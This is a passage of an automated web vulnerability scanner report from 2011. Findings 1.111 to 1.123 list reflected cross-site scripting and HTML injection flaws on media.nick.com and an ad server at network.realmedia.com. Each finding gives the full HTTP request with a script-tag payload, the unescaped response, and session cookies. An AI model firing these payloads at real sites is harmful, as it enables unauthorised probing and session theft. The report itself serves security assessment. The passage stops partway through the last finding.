<gui url="http://media.nick.com/player/gui/?v=1.5.5" formFactor="ff1" height="31" width="100%" includeInLayo
...[SNIP]...

...[SNIP]...

1.111. http://media.nick.com/player/config.jhtml [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://media.nick.com
Path:	/player/config.jhtml

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload a6374<a>4a70358f826 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /player/config.jhtml?uri=mgid%3Acms%3Aitem%3Anick.com%3A653053&group=kids&type=network&site=nicka6374<a>4a70358f826&playerName=teennickCoverFlowPlayer&feedHub=shows HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
Content-Length: 380
Content-Type: text/xml
ETag: c42fcd5863c75db1794bda53668eb5
MTVi-Edge-control: bust-downstream
Expires: Sun, 20 Mar 2011 14:06:07 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:06:07 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?><configuration>
<gui url="http://media.mtvnservices.com/player/error.swf?err=c1" assetType="static" />
</configuration>


...[SNIP]...

1.112. http://media.nick.com/player/config.jhtml [type parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://media.nick.com
Path:	/player/config.jhtml

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 631ba<a>2c9033e1873 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /player/config.jhtml?uri=mgid%3Acms%3Aitem%3Anick.com%3A653053&group=kids&type=network631ba<a>2c9033e1873&site=nick&playerName=teennickCoverFlowPlayer&feedHub=shows HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
Content-Length: 380
Content-Type: text/xml
ETag: c42fcd5863c75db1794bda53668eb5
MTVi-Edge-control: bust-downstream
Expires: Sun, 20 Mar 2011 14:06:06 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:06:06 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?><configuration>
<gui url="http://media.mtvnservices.com/player/error.swf?err=c1" assetType="static" />
</configuration>


...[SNIP]...

1.113. http://media.nick.com/player/config.jhtml [uri parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://media.nick.com
Path:	/player/config.jhtml

Issue detail

The value of the uri request parameter is copied into the HTML document as plain text between tags. The payload ec461<a>285a3fce37a was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /player/config.jhtml?uri=mgid%3Acms%3Aitem%3Anick.com%3A653053ec461<a>285a3fce37a&group=kids&type=network&site=nick&playerName=teennickCoverFlowPlayer&feedHub=shows HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
Content-Length: 5287
Content-Type: text/xml
Set-Cookie: app-instance=nick-com-1-kids-jboss-135; Path=/
Set-Cookie: JSESSIONID=0A475C4902D888B46F35761DE3F5A60A.kids-jboss-135-811-mtvi-com-28851; Path=/
ETag: c42fcd5863c75db1794bda53668eb5
Pragma: no-cache
MTVi-Edge-control: bust-downstream
Cache-Control: max-age=1800
Expires: Sun, 20 Mar 2011 14:36:00 GMT
Date: Sun, 20 Mar 2011 14:06:00 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>

<configuration>


<gui url="http://media.nick.com/player/gui/?v=1.5.5" formFactor="ff1" height="31" width="100%" includeInLayo
...[SNIP]...

...[SNIP]...

1.114. http://media.nick.com/player/gui/ [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.nick.com
Path:	/player/gui/

Issue detail

The value of the v request parameter is copied into the HTML document as plain text between tags. The payload 43caa<script>alert(1)</script>110f7580f38 was submitted in the v parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player/gui/?v=1.5.543caa<script>alert(1)</script>110f7580f38 HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332; app-instance=nick-com-1-kids-jboss-026; JSESSIONID=A5DD8C21C42D57AAE16988AC4D2EBC3C.kids-jboss-026-811-mtvi-com-28851

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
X-Powered-By: PHP/5.2.8
Content-Length: 131
Content-Type: text/html
Cache-Control: max-age=604800
Date: Sun, 20 Mar 2011 14:06:04 GMT
Connection: close
Vary: Accept-Encoding

Couldn't find a player with version 1.5.543caa<script>alert(1)</script>110f7580f38. See available versions <a href="list">here</a>.

1.115. http://media.nick.com/player/release/ [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.nick.com
Path:	/player/release/

Issue detail

The value of the v request parameter is copied into the HTML document as plain text between tags. The payload 405cb<script>alert(1)</script>14d1583db6c was submitted in the v parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player/release/?v=4.8.5405cb<script>alert(1)</script>14d1583db6c HTTP/1.1
Host: media.nick.com
Proxy-Connection: keep-alive
Referer: http://www.teennick.com/assets/swf/Fan.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=rugrats1; MTV_ID=24.143.206.71.1300629905332; app-instance=nick-com-1-kids-jboss-026; JSESSIONID=A5DD8C21C42D57AAE16988AC4D2EBC3C.kids-jboss-026-811-mtvi-com-28851

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8 mod_jk/1.2.27
X-Powered-By: PHP/5.2.8
Content-Length: 131
Content-Type: text/html
Expires: Sun, 20 Mar 2011 14:06:02 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:06:02 GMT
Connection: close
Vary: Accept-Encoding

Couldn't find a player with version 4.8.5405cb<script>alert(1)</script>14d1583db6c. See available versions <a href="list">here</a>.

1.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baf71"><script>alert(1)</script>08b0ebc20fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediabaf71"><script>alert(1)</script>08b0ebc20fb/Retarget_Secure/404157670@Bottom3?_RM_HTML_MM_=150105055115150005515 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:14:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:15:52 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediabaf71"><script>alert(1)</script>08b0ebc20fb/Retarget_Secure/551285304/Bottom3/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515" target="_top">
...[SNIP]...

1.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7a6b"><script>alert(1)</script>e716960cfe5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Securee7a6b"><script>alert(1)</script>e716960cfe5/404157670@Bottom3?_RM_HTML_MM_=150105055115150005515 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:15:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:16:15 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Securee7a6b"><script>alert(1)</script>e716960cfe5/154669343/Bottom3/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515" target="_top">
...[SNIP]...

1.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e84c0"><script>alert(1)</script>c45b5ec7580 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3e84c0"><script>alert(1)</script>c45b5ec7580?_RM_HTML_MM_=150105055115150005515 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:15:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:16:38 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1793119143/Bottom3e84c0"><script>alert(1)</script>c45b5ec7580/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515" target="_top">
...[SNIP]...

1.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3 [_RM_HTML_MM_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c4f"><script>alert(1)</script>bc6b7eb1ff7 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3?_RM_HTML_MM_=15010505511515000551514c4f"><script>alert(1)</script>bc6b7eb1ff7 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:10:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:11:34 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1832382515/Bottom3/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=15010505511515000551514c4f"><script>alert(1)</script>bc6b7eb1ff7" target="_top">
...[SNIP]...

1.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 634de"><script>alert(1)</script>653c786cbd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/404157670@Bottom3?_RM_HTML_MM_=150105055115150005515&634de"><script>alert(1)</script>653c786cbd3=1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856445/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000133c0000000000000000/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:14:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 400
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:15:01 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/115479912/Bottom3/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515&634de"><script>alert(1)</script>653c786cbd3=1" target="_top">
...[SNIP]...

1.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664de"><script>alert(1)</script>b18fe64b816 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia664de"><script>alert(1)</script>b18fe64b816/Retarget_Secure/766798645@Bottom3?_RM_HTML_MM_=150105055115150005515 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:14:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:15:53 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia664de"><script>alert(1)</script>b18fe64b816/Retarget_Secure/1644094075/Bottom3/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515" target="_top">
...[SNIP]...

1.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62f08"><script>alert(1)</script>99d74e2671f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure62f08"><script>alert(1)</script>99d74e2671f/766798645@Bottom3?_RM_HTML_MM_=150105055115150005515 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:15:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 398
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 13:16:16 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure62f08"><script>alert(1)</script>99d74e2671f/1529674209/Bottom3/default/empty.gif/726348573830316934646f4141767949?_RM_HTML_MM_=150105055115150005515" target="_top">
...[SNIP]...

1.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe66"><script>alert(1)</script>bb0eb5cc61d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/766798645@Bottom3ebe66"><script>alert(1)</script>bb0eb5cc61d?_RM_HTML_MM_=150105055115150005515 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; BCN2010110741=1; S247S=1; RMFL=011Pxp1fU10KeT; NXCLICK2=011Pxp1fNX_TRACK_Nationalgeographic/Retarget_Natgeorealhomepage_Nonsecure!y!B3!KeT!ppm3; RMFD=011Q1HsmO1016kC|O1016oi|O1016oj|O1016x1|O10170Y

Response

HTTP/1.1 200 OK
